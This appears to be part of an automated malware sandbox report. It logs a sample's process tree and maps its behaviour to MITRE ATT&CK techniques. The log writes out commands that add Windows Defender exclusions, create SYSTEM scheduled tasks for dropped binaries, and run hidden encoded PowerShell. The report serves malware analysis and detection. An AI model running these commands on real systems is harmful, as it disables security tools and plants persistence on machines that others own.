C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:11932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\FkLlHY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:10636

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\NFeNwPl.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:13528

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qTJPyBJZsADsDDd"
2⤵
PID:7756

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qTJPyBJZsADsDDd"
2⤵
PID:9204

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\NSDmzMI.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:13224

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\YFfFZTe.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8324

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\FvbUmvv.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:13324

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\MnkJpIH.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:9000

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ipNvqDYh\ppBOOOa.exe
"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ipNvqDYh\ppBOOOa.exe" /S Rm
2⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:4456

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:9964

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:12892

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:11000

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:6784

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gvtfilyaT" /SC once /ST 00:05:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:10880

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gvtfilyaT"
3⤵
PID:13152

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gvtfilyaT"
3⤵
PID:4816

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\EbmOkXO.exe\" nh /site_id 724 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:14812

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:13208

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2424

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:13744

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8916

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:10832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:12068

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Browser Extensions

T1176

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery